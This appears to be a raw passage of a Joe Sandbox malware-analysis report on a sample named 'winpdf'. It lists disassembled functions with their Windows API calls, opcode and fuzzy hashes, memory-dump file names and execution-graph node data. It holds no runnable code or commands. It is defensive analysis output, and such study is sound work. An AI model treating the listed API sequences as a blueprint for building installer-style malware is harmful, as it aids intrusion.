                                                                                                                                                                • Opcode Fuzzy Hash: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
                                                                                                                                                                • Instruction Fuzzy Hash: A2014932500214EFCB10EF58CC84A9EBBE9EB84304F20407AF405F3180D6759EA48794
                                                                                                                                                                APIs
                                                                                                                                                                • OleInitialize.OLE32(00000000), ref: 00405057
                                                                                                                                                                  • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                                                                                                                                • OleUninitialize.OLE32(00000404,00000000), ref: 004050A5
                                                                                                                                                                  • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                  • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000003.00000002.19379664933.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000003.00000002.19379640505.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379688284.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000040B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000041F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.0000000000461000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379793532.00000000004F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_winpdf.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                                                                                                                                • String ID: Section: "%s"$Skipping section: "%s"
                                                                                                                                                                • API String ID: 2266616436-4211696005
                                                                                                                                                                • Opcode ID: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                                                                                                                                                                • Instruction ID: 490ae00110c0e09774d0d246d4d4a011172e9101669e5a2b786a62fce758e9f8
                                                                                                                                                                • Opcode Fuzzy Hash: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                                                                                                                                                                • Instruction Fuzzy Hash: 41F0F4338087009BE6506B64AE07B9B77A4DFD4320F24007FFE48721E1ABFC48818A9D
                                                                                                                                                                APIs
                                                                                                                                                                • GetDC.USER32(?), ref: 00402100
                                                                                                                                                                • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                                                                                                                                                • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                                                                                                                                                  • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                                                                                                • CreateFontIndirectW.GDI32(0041F0F0), ref: 0040216A
                                                                                                                                                                  • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000003.00000002.19379664933.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000003.00000002.19379640505.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379688284.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000040B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000041F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.0000000000461000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379793532.00000000004F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_winpdf.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1599320355-0
                                                                                                                                                                • Opcode ID: 6f0d7b084d37585979e4dd0fd2aac30abed8a2b5fd168dddd791f163065a0eb0
                                                                                                                                                                • Instruction ID: 656afd6720eca978824560f17fb47cc17b19fb3a621816cfe3730d6e1c8eda21
                                                                                                                                                                • Opcode Fuzzy Hash: 6f0d7b084d37585979e4dd0fd2aac30abed8a2b5fd168dddd791f163065a0eb0
                                                                                                                                                                • Instruction Fuzzy Hash: DA017172644650EFE701ABB4ED4ABDA3BA4A725315F10C43AE645A61E3C678440A8B2D
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00406ED2: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                                                                                                                                                • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407239
                                                                                                                                                                • lstrcmpW.KERNEL32(?,Version ), ref: 0040724A
                                                                                                                                                                • lstrcpynW.KERNEL32(?,?,?), ref: 00407261
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000003.00000002.19379664933.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000003.00000002.19379640505.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379688284.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000040B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000041F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.0000000000461000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379793532.00000000004F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_winpdf.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: lstrcpyn$CreateFilelstrcmp
                                                                                                                                                                • String ID: Version
                                                                                                                                                                • API String ID: 512980652-315105994
                                                                                                                                                                • Opcode ID: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
                                                                                                                                                                • Instruction ID: 151640cc4cfa07bb85738859349229c9473c158da19ee21f10eacb3052f8d035
                                                                                                                                                                • Opcode Fuzzy Hash: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
                                                                                                                                                                • Instruction Fuzzy Hash: 3EF03172A0021CABDB109AA5DD46EEA777CAB44700F100476F600F6191E6B59E158BA5
                                                                                                                                                                APIs
                                                                                                                                                                • DestroyWindow.USER32(00000000,00000000,00403703,00000001,?,?,?,00000000,00403A47,?), ref: 004032E5
                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00403303
                                                                                                                                                                • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                                                                                                                                                • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A47,?), ref: 0040332E
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000003.00000002.19379664933.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000003.00000002.19379640505.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379688284.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000040B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000041F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.0000000000461000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379793532.00000000004F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_winpdf.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2102729457-0
                                                                                                                                                                • Opcode ID: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
                                                                                                                                                                • Instruction ID: 401e6cecbc7a0b9e3d471fb50fe358663bd3ad25f9a7ebc527197863dd5a4904
                                                                                                                                                                • Opcode Fuzzy Hash: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
                                                                                                                                                                • Instruction Fuzzy Hash: 23F08230502620EBC221AF64FE5CBAB7F68FB04B82701447EF545F12A4CB7849928BDC
                                                                                                                                                                APIs
                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 00406370
                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 00406386
                                                                                                                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 00406395
                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 0040639E
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000003.00000002.19379664933.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000003.00000002.19379640505.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379688284.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000040B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000041F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.0000000000461000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379793532.00000000004F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_winpdf.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2883127279-0
                                                                                                                                                                • Opcode ID: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
                                                                                                                                                                • Instruction ID: 581917a1a4a7218ca9fbbc4554f9bfb31441e22884f00dccc1ee77d568dea7f2
                                                                                                                                                                • Opcode Fuzzy Hash: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
                                                                                                                                                                • Instruction Fuzzy Hash: 19E048712012107BE2101B669E8CD677EADDFCA7B6B05013EF695F51A0CE348C15D675
                                                                                                                                                                APIs
                                                                                                                                                                • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                                                                                                                                                • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000003.00000002.19379664933.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000003.00000002.19379640505.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379688284.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000040B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000041F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.0000000000461000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379793532.00000000004F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_winpdf.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: PrivateProfileStringlstrcmp
                                                                                                                                                                • String ID: !N~
                                                                                                                                                                • API String ID: 623250636-529124213
                                                                                                                                                                • Opcode ID: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
                                                                                                                                                                • Instruction ID: 7cd271610f6b1cb64eb4c57d825f56a096f62725fe87e34e9129affe44791136
                                                                                                                                                                • Opcode Fuzzy Hash: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
                                                                                                                                                                • Instruction Fuzzy Hash: 37E0E571500208ABDB00BBA0DE85DAE7BBCAF05304F14443AF641F71E3EA7459028718
                                                                                                                                                                APIs
                                                                                                                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00405C71
                                                                                                                                                                Strings
                                                                                                                                                                • Error launching installer, xrefs: 00405C48
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000003.00000002.19379664933.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000003.00000002.19379640505.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379688284.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000040B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000041F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.0000000000461000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379793532.00000000004F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_winpdf.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseCreateHandleProcess
                                                                                                                                                                • String ID: Error launching installer
                                                                                                                                                                • API String ID: 3712363035-66219284
                                                                                                                                                                • Opcode ID: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
                                                                                                                                                                • Instruction ID: c3c9ba135fb9cbcc5263534f4c07e322ce29f53e9eda4e03cc008bde6a4ec24c
                                                                                                                                                                • Opcode Fuzzy Hash: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
                                                                                                                                                                • Instruction Fuzzy Hash: 44E0EC70504209ABEF009B64EE49E7F7BBCEB00305F504575BD51E2561D774D9188A68
                                                                                                                                                                APIs
                                                                                                                                                                • SendMessageW.USER32(?,0000000B,?), ref: 004030B7
                                                                                                                                                                • InvalidateRect.USER32(?), ref: 004030C7
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000003.00000002.19379664933.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000003.00000002.19379640505.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379688284.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000040B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000041F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.0000000000461000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379793532.00000000004F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_winpdf.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InvalidateMessageRectSend
                                                                                                                                                                • String ID: `7:v
                                                                                                                                                                • API String ID: 909852535-2810827130
                                                                                                                                                                • Opcode ID: 088eb43494bf164856626970d4d471b198b9237215284f4d034043d20b14c385
                                                                                                                                                                • Instruction ID: 5679666777d3b2c7a26730421b0c2425d4f11acba86c90ee5bbeb3e606204200
                                                                                                                                                                • Opcode Fuzzy Hash: 088eb43494bf164856626970d4d471b198b9237215284f4d034043d20b14c385
                                                                                                                                                                • Instruction Fuzzy Hash: C6E04672A00109EFDB00DFA8FE849AE7B79EB40306B1481BAF102F1060C3768E00DB28
                                                                                                                                                                APIs
                                                                                                                                                                • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                • wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                  • Part of subcall function 004060E7: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000003.00000002.19379664933.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000003.00000002.19379640505.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379688284.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000040B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000041F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.0000000000461000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379793532.00000000004F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_winpdf.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseHandlelstrlenwvsprintf
                                                                                                                                                                • String ID: RMDir: RemoveDirectory invalid input("")
                                                                                                                                                                • API String ID: 3509786178-2769509956
                                                                                                                                                                • Opcode ID: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
                                                                                                                                                                • Instruction ID: 8d95e7b1bd6a8fe250904a0927f32055e446839aab417a06e937ad69edd5bb19
                                                                                                                                                                • Opcode Fuzzy Hash: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
                                                                                                                                                                • Instruction Fuzzy Hash: 04D05E34150316BACA009BA0DE09E997B64FBD0384F50442EF147C5070FA748001C70E
                                                                                                                                                                APIs
                                                                                                                                                                • SendMessageW.USER32(00000408,?,00000000,00405587), ref: 00403D36
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000003.00000002.19379664933.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000003.00000002.19379640505.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379688284.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000040B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000041F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.0000000000461000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379793532.00000000004F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_winpdf.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                • String ID: `7:v$x
                                                                                                                                                                • API String ID: 3850602802-3404455648
                                                                                                                                                                • Opcode ID: fc1b2c6daa09e13596dff260e786d3f2355e41a5558575606fa426c2538cfdb9
                                                                                                                                                                • Instruction ID: d9e2f1905010ecc177937000b868157e5d6a0e28fc4fe332643812db1bb124a0
                                                                                                                                                                • Opcode Fuzzy Hash: fc1b2c6daa09e13596dff260e786d3f2355e41a5558575606fa426c2538cfdb9
                                                                                                                                                                • Instruction Fuzzy Hash: 7DC01271140600EAEA118F40EF05F06BA22AB60702F10803EF389200B586B448A0DB0E
                                                                                                                                                                APIs
                                                                                                                                                                • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                                                                                                                                                • lstrcmpiA.KERNEL32(?,?), ref: 00405DDE
                                                                                                                                                                • CharNextA.USER32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DEF
                                                                                                                                                                • lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000003.00000002.19379664933.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000003.00000002.19379640505.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379688284.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000040B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.000000000041F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379712587.0000000000461000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.19379793532.00000000004F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_winpdf.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 190613189-0
                                                                                                                                                                • Opcode ID: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                                                                                                                                                • Instruction ID: 82a91399e33c41d3abe84131f59dcd741317d7299bce3ff9d06b8c6e92496674
                                                                                                                                                                • Opcode Fuzzy Hash: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                                                                                                                                                • Instruction Fuzzy Hash: D5F0CD31205988EFCB019FA9CD04C9FBBA8EF56350B2180AAE840E7310D630EE01DBA4

                                                                                                                                                                Execution Graph

                                                                                                                                                                Execution Coverage:4.1%
                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                Signature Coverage:2.5%
                                                                                                                                                                Total number of Nodes:2000
                                                                                                                                                                Total number of Limit Nodes:121
                                                                                                                                                                execution_graph 97699 2b9a88 97702 2b86e0 97699->97702 97703 2b86fd 97702->97703 97704 2f0fad 97703->97704 97705 2f0ff8 97703->97705 97730 2b8724 97703->97730 97708 2f0fb5 97704->97708 97713 2f0fc2 97704->97713 97704->97730 97777 32aad0 275 API calls 97705->97777 97775 32b0e4 275 API calls 97708->97775 97711 2b3f42 68 API calls 97711->97730 97726 2b898d 97713->97726 97776 32b58c 275 API calls 97713->97776 97714 2f1289 97714->97714 97716 2f11af 97787 32ae3b 89 API calls 97716->97787 97719 2b8a17 97725 2b3c30 68 API calls 97725->97730 97726->97719 97788 31a48d 89 API calls 97726->97788 97730->97711 97730->97716 97730->97719 97730->97725 97730->97726 97731 2b53b0 97730->97731 97759 2b39be 97730->97759 97763 2b3938 68 API calls 97730->97763 97764 2b855e 275 API calls 97730->97764 97765 2b5278 97730->97765 97770 2d2f70 97730->97770 97773 2b84e2 89 API calls 97730->97773 97774 2b835f 275 API calls 97730->97774 97778 2b523c 97730->97778 97782 3073ab 59 API calls 97730->97782 97783 2c1c9c 97730->97783 97732 2b53cf 97731->97732 97755 2b53fd 97731->97755 97806 2d0fe6 97732->97806 97734 2b69fa 97735 2c1c9c 59 API calls 97734->97735 97754 2b5569 97735->97754 97736 2b69ff 97737 2ef165 97736->97737 97738 2ee691 97736->97738 97821 31a48d 89 API calls 97737->97821 97817 31a48d 89 API calls 97738->97817 97742 2ee6a0 97742->97730 97743 2d0fe6 59 API calls 97743->97755 97745 2eea9a 97749 2c1c9c 59 API calls 97745->97749 97746 2c1c9c 59 API calls 97746->97755 97747 2c1207 59 API calls 97747->97755 97749->97754 97750 2eeb67 97750->97754 97818 307aad 59 API calls 97750->97818 97751 2d2f70 67 API calls 97751->97755 97753 307aad 59 API calls 97753->97755 97754->97730 97755->97734 97755->97736 97755->97738 97755->97743 97755->97745 97755->97746 97755->97747 97755->97750 97755->97751 97755->97753 97755->97754 97756 2eef28 97755->97756 97758 2b5a1a 97755->97758 97789 2b6e30 97755->97789 97816 2b7e50 275 API calls 97755->97816 97819 31a48d 89 API calls 97756->97819 97820 31a48d 89 API calls 97758->97820 97760 2b39c9 97759->97760 97761 2b39f0 97760->97761 97861 2b3ea3 97760->97861 97761->97730 97763->97730 97764->97730 97766 2d0fe6 59 API calls 97765->97766 97767 2b5285 97766->97767 97768 2b5294 97767->97768 97891 2c1a36 97767->97891 97768->97730 97895 2d2e74 97770->97895 97772 2d2f7b 97772->97730 97773->97730 97774->97730 97775->97713 97776->97726 97777->97730 97779 2b524a 97778->97779 97780 2b5250 97778->97780 97779->97780 97781 2c1c9c 59 API calls 97779->97781 97780->97730 97781->97780 97782->97730 97784 2c1caf 97783->97784 97785 2c1ca7 97783->97785 97784->97730 97972 2c1bcc 59 API calls 97785->97972 97787->97726 97788->97714 97790 2b6e4a 97789->97790 97793 2b6ff7 97789->97793 97791 2b74d0 97790->97791 97790->97793 97794 2b6f2c 97790->97794 97800 2b6fdb 97790->97800 97791->97800 97826 2b49e0 59 API calls 97791->97826 97793->97791 97796 2b7076 97793->97796 97793->97800 97804 2b6fbb 97793->97804 97794->97796 97798 2b6f68 97794->97798 97794->97800 97797 2efc1e 97796->97797 97796->97800 97796->97804 97823 307aad 59 API calls 97796->97823 97801 2efc30 97797->97801 97824 2d3f69 59 API calls 97797->97824 97798->97800 97798->97804 97805 2efa71 97798->97805 97800->97755 97801->97755 97804->97797 97804->97800 97825 2b41c4 59 API calls 97804->97825 97805->97800 97822 2d3f69 59 API calls 97805->97822 97810 2d0fee 97806->97810 97808 2d1008 97808->97755 97810->97808 97811 2d100c 97810->97811 97827 2d593c 97810->97827 97844 2d35d1 DecodePointer 97810->97844 97845 2d87cb RaiseException 97811->97845 97813 2d1036 97846 2d8701 58 API calls 97813->97846 97815 2d1048 97815->97755 97816->97755 97817->97742 97818->97754 97819->97758 97820->97754 97821->97754 97822->97805 97823->97804 97824->97801 97825->97804 97826->97800 97828 2d59b7 97827->97828 97835 2d5948 97827->97835 97855 2d35d1 DecodePointer 97828->97855 97830 2d59bd 97856 2d8d58 58 API calls 97830->97856 97833 2d597b RtlAllocateHeap 97833->97835 97843 2d59af 97833->97843 97835->97833 97836 2d59a3 97835->97836 97837 2d5953 97835->97837 97841 2d59a1 97835->97841 97852 2d35d1 DecodePointer 97835->97852 97853 2d8d58 58 API calls 97836->97853 97837->97835 97847 2da39b 58 API calls 97837->97847 97848 2da3f8 58 API calls 97837->97848 97849 2d32cf 97837->97849 97854 2d8d58 58 API calls 97841->97854 97843->97810 97844->97810 97845->97813 97846->97815 97847->97837 97848->97837 97857 2d329b GetModuleHandleExW 97849->97857 97852->97835 97853->97841 97854->97843 97855->97830 97856->97843 97858 2d32cb ExitProcess 97857->97858 97859 2d32b4 GetProcAddress 97857->97859 97859->97858 97860 2d32c6 97859->97860 97860->97858 97877 2b3c30 97861->97877 97863 2b3eb3 97864 2b3f2d 97863->97864 97865 2b3ebd 97863->97865 97867 2b523c 59 API calls 97864->97867 97866 2d0fe6 59 API calls 97865->97866 97868 2b3ece 97866->97868 97876 2b3f1d 97867->97876 97871 2b3edc 97868->97871 97884 2c1207 97868->97884 97870 2b3eeb 97872 2d0fe6 59 API calls 97870->97872 97871->97870 97889 2c1bcc 59 API calls 97871->97889 97874 2b3ef5 97872->97874 97890 2b3bc8 68 API calls 97874->97890 